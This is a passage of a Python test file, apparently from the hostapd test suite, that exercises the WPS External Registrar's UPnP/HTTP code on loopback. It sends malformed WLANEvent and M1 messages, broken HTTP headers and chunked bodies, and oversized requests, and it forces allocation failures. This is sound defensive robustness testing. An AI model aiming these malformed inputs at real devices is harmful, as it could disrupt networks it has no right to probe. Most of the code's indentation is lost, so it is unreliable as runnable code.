wps_event_url = hdr.split(' ')[1].strip('<>')
if "GET /foo.xml" in data:
self.handle_upnp_info()
elif "POST /wps_control" in data:
self.handle_wps_control()
elif "SUBSCRIBE /wps_event" in data:
self.handle_wps_event()
else:
self.handle_others(data)
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info())
def handle_wps_control(self):
self.wfile.write(gen_wps_control())
def handle_wps_event(self):
self.wfile.write(gen_wps_event())
def handle_others(self, data):
logger.info("Ignore HTTP request: " + data)
class MyTCPServer(TCPServer):
def __init__(self, addr, handler):
self.allow_reuse_address = True
TCPServer.__init__(self, addr, handler)
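# Start the WPS ER on the loopback interface and emulate SSDP discovery:
# the ER multicasts an M-SEARCH to 239.255.255.250:1900 and this test
# answers it with a unicast 200 OK that advertises the location URL of the
# emulated AP and a max-age lifetime.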
def wps_er_start(dev, http_server, max_age=1, wait_m_search=False,
location_url=None):
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("239.255.255.250", 1900))
dev.request("WPS_ER_START ifname=lo")
for i in range(100):
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" in msg:
break
if not wait_m_search:
raise Exception("Not an M-SEARCH")
if i == 99:
raise Exception("No M-SEARCH seen")
    # Add an AP with a valid URL and a server listening on it
server = MyTCPServer(("127.0.0.1", 12345), http_server)
if not location_url:
location_url = 'http://127.0.0.1:12345/foo.xml'
sock.sendto(("HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:%s\r\ncache-control:max-age=%d\r\n\r\n" % (location_url, max_age)).encode(), addr)
server.timeout = 1
return server,sock
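# Tear down the emulated AP. With on_alloc_fail=True, poll GET_ALLOC_FAIL
# until the response starts with "0:", i.e., the scheduled allocation
# failure has been consumed, instead of waiting for the AP entry to expire
# with a WPS-ER-AP-REMOVE event.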
def wps_er_stop(dev, sock, server, on_alloc_fail=False):
sock.close()
server.server_close()
if on_alloc_fail:
done = False
for i in range(50):
res = dev.request("GET_ALLOC_FAIL")
if res.startswith("0:"):
done = True
break
time.sleep(0.1)
if not done:
raise Exception("No allocation failure reported")
else:
ev = dev.wait_event(["WPS-ER-AP-REMOVE"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-AP-REMOVE event on max-age timeout")
dev.request("WPS_ER_STOP")
def run_wps_er_proto_test(dev, handler, no_event_url=False, location_url=None):
try:
uuid = '27ea801a-9e5c-4e73-bd82-f89cbcd10d7e'
server,sock = wps_er_start(dev, handler, location_url=location_url)
global wps_event_url
wps_event_url = None
server.handle_request()
server.handle_request()
server.handle_request()
server.server_close()
if no_event_url:
if wps_event_url:
raise Exception("Received event URL unexpectedly")
return
if wps_event_url is None:
raise Exception("Did not get event URL")
logger.info("Event URL: " + wps_event_url)
finally:
dev.request("WPS_ER_STOP")
def send_wlanevent(url, uuid, data, no_response=False):
conn = HTTPConnection(url.netloc)
payload = '''<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
<e:property><STAStatus>1</STAStatus></e:property>
<e:property><APStatus>1</APStatus></e:property>
<e:property><WLANEvent>'''
payload += base64.b64encode(data).decode()
payload += '</WLANEvent></e:property></e:propertyset>'
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
if no_response:
try:
conn.getresponse()
        except Exception:
pass
return
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
def test_ap_wps_er_http_proto(dev, apdev):
"""WPS ER HTTP protocol testing"""
try:
_test_ap_wps_er_http_proto(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_http_proto(dev, apdev):
uuid = '27ea801a-9e5c-4e73-bd82-f89cbcd10d7e'
server,sock = wps_er_start(dev[0], WPSAPHTTPServer, max_age=15)
global wps_event_url
wps_event_url = None
server.handle_request()
server.handle_request()
server.handle_request()
server.server_close()
if wps_event_url is None:
raise Exception("Did not get event URL")
logger.info("Event URL: " + wps_event_url)
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("No WPS-ER-AP-ADD event")
if uuid not in ev:
raise Exception("UUID mismatch")
sock.close()
logger.info("Valid Probe Request notification")
url = urlparse(wps_event_url)
conn = HTTPConnection(url.netloc)
payload = '''<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
<e:property><STAStatus>1</STAStatus></e:property>
<e:property><APStatus>1</APStatus></e:property>
<e:property><WLANEvent>ATAyOjAwOjAwOjAwOjAwOjAwEEoAARAQOgABAhAIAAIxSBBHABA2LbR7pTpRkYj7VFi5hrLk
EFQACAAAAAAAAAAAEDwAAQMQAgACAAAQCQACAAAQEgACAAAQIQABIBAjAAEgECQAASAQEQAI
RGV2aWNlIEEQSQAGADcqAAEg
</WLANEvent></e:property>
</e:propertyset>
'''
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-ENROLLEE-ADD event")
if "362db47b-a53a-5191-88fb-5458b986b2e4" not in ev:
raise Exception("No Enrollee UUID match")
logger.info("Incorrect event URL AP id")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", url.path + '123', payload, headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.info("Missing AP id")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", '/event/' + url.path.split('/')[2],
payload, headers)
time.sleep(0.1)
logger.info("Incorrect event URL event id")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", '/event/123456789/123', payload, headers)
time.sleep(0.1)
logger.info("Incorrect event URL prefix")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", '/foobar/123456789/123', payload, headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.info("Unsupported request")
conn = HTTPConnection(url.netloc)
conn.request("FOOBAR", '/foobar/123456789/123', payload, headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.info("Unsupported request and OOM")
with alloc_fail(dev[0], 1, "wps_er_http_req"):
conn = HTTPConnection(url.netloc)
conn.request("FOOBAR", '/foobar/123456789/123', payload, headers)
time.sleep(0.5)
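    # The WLANEvent value is one octet of WLANEventType (1 = Probe Request,
    # 2 = EAP frame) followed by a 17-character ASCII WLANEventMAC
    # ("xx:xx:xx:xx:xx:xx") and the raw event payload; the cases below
    # malform each part in turn.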
logger.info("Too short WLANEvent")
data = b'\x00'
send_wlanevent(url, uuid, data)
logger.info("Invalid WLANEventMAC")
data = b'\x00qwertyuiopasdfghjklzxcvbnm'
send_wlanevent(url, uuid, data)
logger.info("Unknown WLANEventType")
data = b'\xff02:00:00:00:00:00'
send_wlanevent(url, uuid, data)
logger.info("Probe Request notification without any attributes")
data = b'\x0102:00:00:00:00:00'
send_wlanevent(url, uuid, data)
logger.info("Probe Request notification with invalid attribute")
data = b'\x0102:00:00:00:00:00\xff'
send_wlanevent(url, uuid, data)
logger.info("EAP message without any attributes")
data = b'\x0202:00:00:00:00:00'
send_wlanevent(url, uuid, data)
logger.info("EAP message with invalid attribute")
data = b'\x0202:00:00:00:00:00\xff'
send_wlanevent(url, uuid, data)
logger.info("EAP message from new STA and not M1")
data = b'\x0202:ff:ff:ff:ff:ff' + b'\x10\x22\x00\x01\x05'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1")
data = b'\x0202:00:00:00:00:00'
data += b'\x10\x22\x00\x01\x04'
data += b'\x10\x47\x00\x10' + 16 * b'\x00'
data += b'\x10\x20\x00\x06\x02\x00\x00\x00\x00\x00'
data += b'\x10\x1a\x00\x10' + 16 * b'\x00'
data += b'\x10\x32\x00\xc0' + 192 * b'\x00'
data += b'\x10\x04\x00\x02\x00\x00'
data += b'\x10\x10\x00\x02\x00\x00'
data += b'\x10\x0d\x00\x01\x00'
data += b'\x10\x08\x00\x02\x00\x00'
data += b'\x10\x44\x00\x01\x00'
data += b'\x10\x21\x00\x00'
data += b'\x10\x23\x00\x00'
data += b'\x10\x24\x00\x00'
data += b'\x10\x42\x00\x00'
data += b'\x10\x54\x00\x08' + 8 * b'\x00'
data += b'\x10\x11\x00\x00'
data += b'\x10\x3c\x00\x01\x00'
data += b'\x10\x02\x00\x02\x00\x00'
data += b'\x10\x12\x00\x02\x00\x00'
data += b'\x10\x09\x00\x02\x00\x00'
data += b'\x10\x2d\x00\x04\x00\x00\x00\x00'
m1 = data
send_wlanevent(url, uuid, data)
logger.info("EAP message: WSC_ACK")
data = b'\x0202:00:00:00:00:00' + b'\x10\x22\x00\x01\x0d'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1")
send_wlanevent(url, uuid, m1)
logger.info("EAP message: WSC_NACK")
data = b'\x0202:00:00:00:00:00' + b'\x10\x22\x00\x01\x0e'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 - Too long attribute values")
data = b'\x0202:00:00:00:00:00'
data += b'\x10\x11\x00\x21' + 33 * b'\x00'
data += b'\x10\x45\x00\x21' + 33 * b'\x00'
data += b'\x10\x42\x00\x21' + 33 * b'\x00'
data += b'\x10\x24\x00\x21' + 33 * b'\x00'
data += b'\x10\x23\x00\x21' + 33 * b'\x00'
data += b'\x10\x21\x00\x41' + 65 * b'\x00'
data += b'\x10\x49\x00\x09\x00\x37\x2a\x05\x02\x00\x00\x05\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing UUID-E")
data = b'\x0202:00:00:00:00:00'
data += b'\x10\x22\x00\x01\x04'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing MAC Address")
data += b'\x10\x47\x00\x10' + 16 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Enrollee Nonce")
data += b'\x10\x20\x00\x06\x02\x00\x00\x00\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Public Key")
data += b'\x10\x1a\x00\x10' + 16 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Authentication Type flags")
data += b'\x10\x32\x00\xc0' + 192 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Encryption Type Flags")
data += b'\x10\x04\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Connection Type flags")
data += b'\x10\x10\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Config Methods")
data += b'\x10\x0d\x00\x01\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Wi-Fi Protected Setup State")
data += b'\x10\x08\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Manufacturer")
data += b'\x10\x44\x00\x01\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Model Name")
data += b'\x10\x21\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Model Number")
data += b'\x10\x23\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Serial Number")
data += b'\x10\x24\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Primary Device Type")
data += b'\x10\x42\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Device Name")
data += b'\x10\x54\x00\x08' + 8 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing RF Bands")
data += b'\x10\x11\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Association State")
data += b'\x10\x3c\x00\x01\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Device Password ID")
data += b'\x10\x02\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Configuration Error")
data += b'\x10\x12\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing OS Version")
data += b'\x10\x09\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("Check max concurrent requests")
addr = (url.hostname, url.port)
socks = {}
for i in range(20):
socks[i] = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
socks[i].settimeout(10)
socks[i].connect(addr)
for i in range(20):
socks[i].send(b"GET / HTTP/1.1\r\n\r\n")
count = 0
for i in range(20):
try:
res = socks[i].recv(100).decode()
if "HTTP/1" in res:
count += 1
else:
logger.info("recv[%d]: len=%d" % (i, len(res)))
except:
pass
socks[i].close()
logger.info("%d concurrent HTTP GET operations returned response" % count)
if count < 8:
raise Exception("Too few concurrent HTTP connections accepted")
logger.info("OOM in HTTP server")
for func in [ "http_request_init", "httpread_create",
"eloop_register_timeout;httpread_create",
"eloop_sock_table_add_sock;?eloop_register_sock;httpread_create",
"httpread_hdr_analyze" ]:
with alloc_fail(dev[0], 1, func):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.connect(addr)
sock.send(b"GET / HTTP/1.1\r\n\r\n")
try:
sock.recv(100)
except:
pass
sock.close()
logger.info("Invalid HTTP header")
for req in [ " GET / HTTP/1.1\r\n\r\n",
"HTTP/1.1 200 OK\r\n\r\n",
"HTTP/\r\n\r\n",
"GET %%a%aa% HTTP/1.1\r\n\r\n",
"GET / HTTP/1.1\r\n FOO\r\n\r\n",
"NOTIFY / HTTP/1.1\r\n" + 4097*'a' + '\r\n\r\n',
"NOTIFY / HTTP/1.1\r\n\r\n" + 8193*'a',
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n foo\r\n",
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n1\r\nfoo\r\n",
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n0\r\n",
"POST / HTTP/1.1\r\nTransfer-Encoding: CHUNKED\r\n\r\n0\r\naa\ra\r\n\ra" ]:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.settimeout(0.1)
sock.connect(addr)
sock.send(req.encode())
try:
sock.recv(100)
except:
pass
sock.close()
with alloc_fail(dev[0], 2, "httpread_read_handler"):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.connect(addr)
sock.send(b"NOTIFY / HTTP/1.1\r\n\r\n" + 4500 * b'a')
try:
sock.recv(100)
except:
pass
sock.close()
conn = HTTPConnection(url.netloc)
payload = '<foo'
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn = HTTPConnection(url.netloc)
payload = '<WLANEvent foo></WLANEvent>'
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(dev[0], 1, "xml_get_first_item"):
send_wlanevent(url, uuid, b'')
with alloc_fail(dev[0], 1, "wpabuf_alloc_ext_data;xml_get_base64_item"):
send_wlanevent(url, uuid, b'foo')
for func in [ "wps_init",
"wps_process_manufacturer",
"wps_process_model_name",
"wps_process_model_number",
"wps_process_serial_number",
"wps_process_dev_name" ]:
with alloc_fail(dev[0], 1, func):
send_wlanevent(url, uuid, m1)
with alloc_fail(dev[0], 1, "wps_er_http_resp_ok"):
send_wlanevent(url, uuid, m1, no_response=True)
with alloc_fail(dev[0], 1, "wps_er_http_resp_not_found"):
url2 = urlparse(wps_event_url.replace('/event/', '/notfound/'))
send_wlanevent(url2, uuid, m1, no_response=True)
logger.info("EAP message: M1")
data = b'\x0202:11:22:00:00:00'
data += b'\x10\x22\x00\x01\x04'
data += b'\x10\x47\x00\x10' + 16 * b'\x00'
data += b'\x10\x20\x00\x06\x02\x00\x00\x00\x00\x00'
data += b'\x10\x1a\x00\x10' + 16 * b'\x00'
data += b'\x10\x32\x00\xc0' + 192 * b'\x00'
data += b'\x10\x04\x00\x02\x00\x00'
data += b'\x10\x10\x00\x02\x00\x00'
data += b'\x10\x0d\x00\x01\x00'
data += b'\x10\x08\x00\x02\x00\x00'
data += b'\x10\x44\x00\x01\x00'
data += b'\x10\x21\x00\x00'
data += b'\x10\x23\x00\x00'
data += b'\x10\x24\x00\x00'
data += b'\x10\x42\x00\x00'
data += b'\x10\x54\x00\x08' + 8 * b'\x00'
data += b'\x10\x11\x00\x00'
data += b'\x10\x3c\x00\x01\x00'
data += b'\x10\x02\x00\x02\x00\x00'
data += b'\x10\x12\x00\x02\x00\x00'
data += b'\x10\x09\x00\x02\x00\x00'
data += b'\x10\x2d\x00\x04\x00\x00\x00\x00'
dev[0].dump_monitor()
with alloc_fail(dev[0], 1, "wps_er_add_sta_data"):
send_wlanevent(url, uuid, data)
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected enrollee add event")
send_wlanevent(url, uuid, data)
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=2)
if ev is None:
raise Exception("Enrollee add event not seen")
with alloc_fail(dev[0], 1,
"base64_gen_encode;?base64_encode;wps_er_soap_hdr"):
send_wlanevent(url, uuid, data)
with alloc_fail(dev[0], 1, "wpabuf_alloc;wps_er_soap_hdr"):
send_wlanevent(url, uuid, data)
with alloc_fail(dev[0], 1, "http_client_url_parse;wps_er_sta_send_msg"):
send_wlanevent(url, uuid, data)
with alloc_fail(dev[0], 1, "http_client_addr;wps_er_sta_send_msg"):
send_wlanevent(url, uuid, data)
def test_ap_wps_er_http_proto_no_event_sub_url(dev, apdev):
"""WPS ER HTTP protocol testing - no eventSubURL"""
class WPSAPHTTPServer_no_event_sub_url(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(eventSubURL=None))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_event_sub_url,
no_event_url=True)
def test_ap_wps_er_http_proto_event_sub_url_dns(dev, apdev):
"""WPS ER HTTP protocol testing - DNS name in eventSubURL"""
class WPSAPHTTPServer_event_sub_url_dns(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(eventSubURL='http://example.com/wps_event'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_event_sub_url_dns,
no_event_url=True)
def test_ap_wps_er_http_proto_subscribe_oom(dev, apdev):
"""WPS ER HTTP protocol testing - subscribe OOM"""
try:
_test_ap_wps_er_http_proto_subscribe_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_http_proto_subscribe_oom(dev, apdev):
tests = [ (1, "http_client_url_parse"),
(1, "wpabuf_alloc;wps_er_subscribe"),
(1, "http_client_addr"),
(1, "eloop_sock_table_add_sock;?eloop_register_sock;http_client_addr"),
(1, "eloop_register_timeout;http_client_addr") ]
for count,func in tests:
with alloc_fail(dev[0], count, func):
server,sock = wps_er_start(dev[0], WPSAPHTTPServer)
server.handle_request()
server.handle_request()
wps_er_stop(dev[0], sock, server, on_alloc_fail=True)
def test_ap_wps_er_http_proto_no_sid(dev, apdev):
"""WPS ER HTTP protocol testing - no SID"""
class WPSAPHTTPServer_no_sid(WPSAPHTTPServer):
def handle_wps_event(self):
self.wfile.write(gen_wps_event(sid=None))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_sid)
def test_ap_wps_er_http_proto_invalid_sid_no_uuid(dev, apdev):
"""WPS ER HTTP protocol testing - invalid SID - no UUID"""
class WPSAPHTTPServer_invalid_sid_no_uuid(WPSAPHTTPServer):
def handle_wps_event(self):
self.wfile.write(gen_wps_event(sid='FOO'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_sid_no_uuid)
def test_ap_wps_er_http_proto_invalid_sid_uuid(dev, apdev):
"""WPS ER HTTP protocol testing - invalid SID UUID"""
class WPSAPHTTPServer_invalid_sid_uuid(WPSAPHTTPServer):
def handle_wps_event(self):
self.wfile.write(gen_wps_event(sid='uuid:FOO'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_sid_uuid)
def test_ap_wps_er_http_proto_subscribe_failing(dev, apdev):
"""WPS ER HTTP protocol testing - SUBSCRIBE failing"""
class WPSAPHTTPServer_fail_subscribe(WPSAPHTTPServer):
def handle_wps_event(self):
payload = ""
hdr = 'HTTP/1.1 404 Not Found\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Timeout: Second-1801\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_fail_subscribe)
def test_ap_wps_er_http_proto_subscribe_invalid_response(dev, apdev):
"""WPS ER HTTP protocol testing - SUBSCRIBE and invalid response"""
class WPSAPHTTPServer_subscribe_invalid_response(WPSAPHTTPServer):
def handle_wps_event(self):
payload = ""
hdr = 'HTTP/1.1 FOO\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Timeout: Second-1801\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_subscribe_invalid_response)
def test_ap_wps_er_http_proto_invalid_m1(dev, apdev):
    """WPS ER HTTP protocol testing - invalid M1"""
class WPSAPHTTPServer_invalid_m1(WPSAPHTTPServer):
def handle_wps_control(self):
payload = '''<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetDeviceInfoResponse xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewDeviceInfo>Rk9P</NewDeviceInfo>
</u:GetDeviceInfoResponse>
</s:Body>
</s:Envelope>
'''
self.wfile.write(gen_wps_control(payload_override=payload))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_m1, no_event_url=True)
def test_ap_wps_er_http_proto_upnp_info_no_device(dev, apdev):
"""WPS ER HTTP protocol testing - No device in UPnP info"""
class WPSAPHTTPServer_no_device(WPSAPHTTPServer):
def handle_upnp_info(self):
payload = '''<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
</root>
'''
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_device, no_event_url=True)
def test_ap_wps_er_http_proto_upnp_info_no_device_type(dev, apdev):
"""WPS ER HTTP protocol testing - No deviceType in UPnP info"""
    class WPSAPHTTPServer_no_device_type(WPSAPHTTPServer):
def handle_upnp_info(self):
payload = '''<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
</device>
</root>
'''
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
self.wfile.write((hdr + payload).encode())
    run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_device_type, no_event_url=True)
def test_ap_wps_er_http_proto_upnp_info_invalid_udn_uuid(dev, apdev):
"""WPS ER HTTP protocol testing - Invalid UDN UUID"""
class WPSAPHTTPServer_invalid_udn_uuid(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(udn='uuid:foo'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_invalid_udn_uuid)
def test_ap_wps_er_http_proto_no_control_url(dev, apdev):
"""WPS ER HTTP protocol testing - no controlURL"""
class WPSAPHTTPServer_no_control_url(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(controlURL=None))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_no_control_url,
no_event_url=True)
def test_ap_wps_er_http_proto_control_url_dns(dev, apdev):
"""WPS ER HTTP protocol testing - DNS name in controlURL"""
class WPSAPHTTPServer_control_url_dns(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(controlURL='http://example.com/wps_control'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_control_url_dns,
no_event_url=True)
def test_ap_wps_http_timeout(dev, apdev):
"""WPS AP/ER and HTTP timeout"""
try:
_test_ap_wps_http_timeout(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_http_timeout(dev, apdev):
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
addr = (url.hostname, url.port)
logger.debug("Open HTTP connection to hostapd, but do not complete request")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.connect(addr)
sock.send(b"G")
class DummyServer(StreamRequestHandler):
def handle(self):
logger.debug("DummyServer - start 31 sec wait")
time.sleep(31)
logger.debug("DummyServer - wait done")
logger.debug("Start WPS ER")
server,sock2 = wps_er_start(dev[0], DummyServer, max_age=40,
wait_m_search=True)
logger.debug("Start server to accept, but not complete, HTTP connection from WPS ER")
    # This will wait for 31 seconds.
server.handle_request()
logger.debug("Complete HTTP connection with hostapd (that should have already closed the connection)")
try:
sock.send("ET / HTTP/1.1\r\n\r\n")
res = sock.recv(100)
sock.close()
except:
pass
def test_ap_wps_er_url_parse(dev, apdev):
"""WPS ER and URL parsing special cases"""
try:
_test_ap_wps_er_url_parse(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_url_parse(dev, apdev):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.settimeout(1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("239.255.255.250", 1900))
dev[0].request("WPS_ER_START ifname=lo")
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" not in msg:
raise Exception("Not an M-SEARCH")
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=2)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1/:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=2)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://255.255.255.255:0/foo.xml\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=2)
sock.close()
def test_ap_wps_er_link_update(dev, apdev):
"""WPS ER and link update special cases"""
class WPSAPHTTPServer_link_update(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info(controlURL='/wps_control'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_link_update)
class WPSAPHTTPServer_link_update2(WPSAPHTTPServer):
def handle_others(self, data):
if "GET / " in data:
self.wfile.write(gen_upnp_info(controlURL='/wps_control'))
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_link_update2,
location_url='http://127.0.0.1:12345')
def test_ap_wps_er_http_client(dev, apdev):
